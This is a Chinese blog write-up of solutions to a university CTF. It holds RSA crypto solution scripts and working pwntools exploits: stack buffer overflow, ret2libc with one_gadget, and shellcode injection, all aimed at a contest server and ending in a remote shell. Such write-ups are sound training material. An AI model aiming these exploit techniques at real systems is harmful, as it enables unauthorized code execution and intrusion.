【WP】The 3rd CTF for CDUT DinoTeam

十一月 20, 2022

备考期间还忙里偷闲，不请自来瞎掺和一脚恐龙的校赛，拿了好几个一血被狠狠地爽到了（）！

刘师傅听我说谢谢你，因为有你温暖了四季！😋😋

Crypto

Can can need p

task.py

import hashlib
import random
import string
from Crypto.Util.number import bytes_to_long, getPrime
from secret import flag

def proof_of_work():
    s = "".join(random.sample(string.ascii_letters + string.digits, 20))
    prefix = s[:4]
    print("sha256(xxxx + %s) == %s " %
          (s[4:], hashlib.sha256(s.encode()).hexdigest()))
    ans = input("Give me xxxx:").strip()
    if len(ans) == 4 and ans == prefix:
        return True
    else:
        return False

BITS = 512
UNKNOWN_BITS = 209

if __name__ == "__main__":
    if not proof_of_work():
        exit(0)

    m = bytes_to_long(flag.encode())
    p = getPrime(BITS)
    q = getPrime(BITS)
    n = p*q
    e = 0x10001
    c = pow(m, e, n)

    print(n)
    print(c)

    ans = input("Give me flag:").strip()
    if ans == flag:
        print('Cheater!')
        exit(0)
    print("Wrong!")

    print("But can I help you with some part of p?")
    print("1. Yes, can, can, need!")
    print("2. No, thank you.")
    opt = input().strip()
    if opt == '1':
        print(p >> UNKNOWN_BITS)
        ans = input("Now give me flag:").strip()
        if ans == flag:
            print("Success!")
        else:
            print("Wrong!")
    else:
        print("Bye")

exp1

import hashlib
import random
import string
from Crypto.Util.number import bytes_to_long, getPrime
from secret import *

p = "".join(random.sample(string.ascii_letters + string.digits, 4))
p2=p+"pQCyZx63PwzAqvn1"
s = hashlib.sha256(p2.encode()).hexdigest()
while s!="c46336b53554bc39b3bc63aad4474a4ab714039dab35f77595e7f5e5060e6636":
    p = "".join(random.sample(string.ascii_letters + string.digits, 4))
    p2=p+"pQCyZx63PwzAqvn1"
    s = hashlib.sha256(p2.encode()).hexdigest()
    # s = "".join(random.sample(string.ascii_letters + string.digits, 4))
    # prefix = s[:4]
    # hashlib.sha256(s.encode()).hexdigest()
    print(s)
print(p)

exp2：求p

from sage.all import *
n =82212254497904947665149102513251405705479967930009481859905256645581626201426522544604397443256577540757570698901154519712601424569578579724704032952003372427544379650204925510411735586757460620658423602786408830706374024321117921997478547757745751221661535934681818365428789289484990903284626922746096723797
p4=10345341890692903415019083428257191470120154024503374064162101187141047480401937826546305014
e = 0x10001
pbits = 512
kbits = pbits - p4.nbits()
print(p4.nbits())
p4 = p4 << kbits
PR.<x> = PolynomialRing(Zmod(n))
f = x + p4
roots = f.small_roots(X=2^kbits, beta=0.4)
if roots:        
    p = p4+int(roots[0])
    print ("n: ", n)   
    print ("p: ", p)
    print ("q: ", n/p)

exp3：解m

import hashlib
import random
import string
from Crypto.Util.number import bytes_to_long, getPrime
from secret import *

p = "".join(random.sample(string.ascii_letters + string.digits, 4))
p2=p+"rdPhgxVFpGKu3QWA"
s = hashlib.sha256(p2.encode()).hexdigest()
while s!="0e4f516f8b205ce622643b138465df283b873c5dd7e571e72782a3be3dfb113d":
    p = "".join(random.sample(string.ascii_letters + string.digits, 4))
    p2=p+"rdPhgxVFpGKu3QWA"
    s = hashlib.sha256(p2.encode()).hexdigest()
    # s = "".join(random.sample(string.ascii_letters + string.digits, 4))
    # prefix = s[:4]
    # hashlib.sha256(s.encode()).hexdigest()
    print(s)
print(p)

exp4：解flag

import hashlib
import random
import string
from Crypto.Util.number import bytes_to_long, getPrime
from secret import *
import libnum
from Crypto.Util.number import bytes_to_long,long_to_bytes, getPrime

# p=10527914167368920342295577854040420698608040513653892604918136037544963294095623388091973757715423064586645602171891926735814952937421420715661420333153877
# p1=p>>209
# p2=p<<209
# print(p)
# print(p1)
# print(p2)
#解密
# c = 316373661543805349913021175173178075076043336747584809479404893037761325002836448478929162441358584065273128665159716774937164288497405665632191042332284521034723318938145687304333167955134376408787169266592597190235042275754423249188194807283871814374991344678388696730582580243466934552357008164569586579
# n = 137295590174370258486779692298839352161086651167877263147002621412765977505801742456561849024393193294185122288857756503649721099891079398162452242781237890612610172597434081038114396793013546742597950033582736102625310269690111868650382301222975921369762070823698088192861519989428626676998168867483053538783
# e = 65537
# m = 52634920258495179198202018692852653202467113088262411550134221448755053799027415413277324275128623186460743317639751865203989163790742691124089605187259640154793719189357570000664558301354961450571312688493683682852277885940615012557656614345423380110358955641052222083900962251299983127665464086008108212649
m= 56006392793407054493666609262667755231281389027552026053722377890467005309920799189185056143150572669
m = long_to_bytes(m)
print(m.decode())
print(m)

# m2 = m.decode()
# print(m)
# print(m2)
# print(m1)
# p=14364037588752333310498519350387744613077754808676149648804089522392247361288505668971140852
# p=p<<209
# q=n // p
# print(p)
# print(q)
# print(m.decode())

RSA1

已知(e,n,c)，求m。（低加密指数攻击）

enc.py

from Crypto.Util.number import *
from flag import flag


m = bytes_to_long(flag)
p, q = getPrime(32), getPrime(1024)
n = p * q
e = 0x3

c = pow(m, e, n)
print("c = %d" %c)
print("n = %d" %n)

"""
c = 165527641537962453158385346595580222293326378381594431827597366486166401160303849028319637296466564187067059992600278363170882182385646208386765262608536513136513222747556263528436428933807161852842186912918227517362704487324744539937359952905722677507738750871327455083935808647964763470500287612530277
n = 345675713266547546727997788631735009412387157990066144394619901220478972853548799919916572067895437774688186483367134372170356307628474622726432885853473078843359790348707975349499704660462018761449242448381765593725869513432095247724237852265875808599860098758473511684359800791176948572617684399894397044344654638787
"""

exp

import gmpy2
import binascii

n = 345675713266547546727997788631735009412387157990066144394619901220478972853548799919916572067895437774688186483367134372170356307628474622726432885853473078843359790348707975349499704660462018761449242448381765593725869513432095247724237852265875808599860098758473511684359800791176948572617684399894397044344654638787
e = 0x3
c = 165527641537962453158385346595580222293326378381594431827597366486166401160303849028319637296466564187067059992600278363170882182385646208386765262608536513136513222747556263528436428933807161852842186912918227517362704487324744539937359952905722677507738750871327455083935808647964763470500287612530277

i = 0
while True:
    if gmpy2.iroot((c+i*n),3)[1] == True:
        m = gmpy2.iroot((c+i*n),3)[0]
        break
    i += 1

print(binascii.unhexlify(hex(m)[2:]))

RSA2

py

from Crypto.Util.number import *
from flag import flag

e = 0x10001
p, q = getPrime(512), getPrime(512)
n = p * q

m = bytes_to_long(flag)
c = pow(m, e, n)
phi = (p - 1) * (q - 1)
d = inverse(e, phi)


print("c = {}".format(c))
print("d = {}".format(str(d)[:-2]))
print("n = {}".format(n))


"""
c = 49390162755988534272839928189991825891307784475755681388594697611101453362175250775346123763727149792590904709709554866101928772410626273560395694701931925004491665335392802508387050154913787966731787005845054735401376590684545817872728193152896069447282539090781054295392440108754707061288239561284988053345
d = 596339328004701220895674615970487087143840236892412545268109179554413648178156984971303333524689454052342226732334953464364267428945022850108842486057591229295824078053706083822155009310809557722688312434219946602472705063768084789766044292413211122657306229335083834655999999554553242732078756654198918122
n = 77314125696229681333016473406246908467153031859976342194334463502388936222852372550077757802586691889670331381517380504834898109774025642982360455012376588512613635110670341910089851243026132252968232462722302427873254832544089214984924968229850007931672798652990253526875411677891469374519638759569863162731
"""

exp

拼接两位

循环解出m遍历一下dino/flag

import gmpy2
from Crypto.Util.number import *
c = 49390162755988534272839928189991825891307784475755681388594697611101453362175250775346123763727149792590904709709554866101928772410626273560395694701931925004491665335392802508387050154913787966731787005845054735401376590684545817872728193152896069447282539090781054295392440108754707061288239561284988053345
# d = "596339328004701220895674615970487087143840236892412545268109179554413648178156984971303333524689454052342226732334953464364267428945022850108842486057591229295824078053706083822155009310809557722688312434219946602472705063768084789766044292413211122657306229335083834655999999554553242732078756654198918122"
n = 77314125696229681333016473406246908467153031859976342194334463502388936222852372550077757802586691889670331381517380504834898109774025642982360455012376588512613635110670341910089851243026132252968232462722302427873254832544089214984924968229850007931672798652990253526875411677891469374519638759569863162731
e = 0x10001
d = "596339328004701220895674615970487087143840236892412545268109179554413648178156984971303333524689454052342226732334953464364267428945022850108842486057591229295824078053706083822155009310809557722688312434219946602472705063768084789766044292413211122657306229335083834655999999554553242732078756654198918122"
i=0
while(i<10):
      j=0
      while(j<10):
         d1=int(d+str(i)+str(j))
         m = gmpy2.powmod(c, d1, n)  # 解密
         m = long_to_bytes(m)
         j += 1
         print(m)
         # print(d1)
      i+=1

PWN

Stack_gets

from pwn import *
io = process('./stack_gets')
io = remote("47.108.176.78",9150)
success_addr = 0x0000000000400791
payload = b'a' *0x18+ p64(success_addr)
io.sendline(payload)
io.interactive()

stack_one

from pwn import*
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
io=remote("47.108.176.78",9137)
#io = process("./one_getgad")
elf = ELF("./one_getgad")

io.recvuntil(b"=====")
io.sendline(b"1")
io.recvuntil(b"\n")
puts_addr = u64(io.recv(6).ljust(8,b"\x00"))
print(hex(puts_addr))
libc = LibcSearcher("puts",puts_addr)
base = puts_addr-libc.dump("puts")
one_gadget = base+0x45216
print(hex(one_gadget))
io.recvuntil(b"=====")
io.sendline(b"2")
#gdb.attach(io)
#pause()
paylaod = b"a"*(0x10+8)+p64(one_gadget)
io.recvuntil(b"tell me something")
io.send(paylaod)
io.interactive()

这题除了one_gedget之外，还有一种就是stack pivoting，俗称栈迁移

shellcode

from pwn import*
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
io=remote("47.108.176.78",9135)
# elf = ELF("./pwn/one_getgad")

ret = 0x196082000
shellcode = asm(shellcraft.sh())
io.send(shellcode)
payload = b"a"*(0x10+8)+p64(ret)
io.send(payload)
io.interactive()

Stack_revenge

查看评论

1. Crypto
2. PWN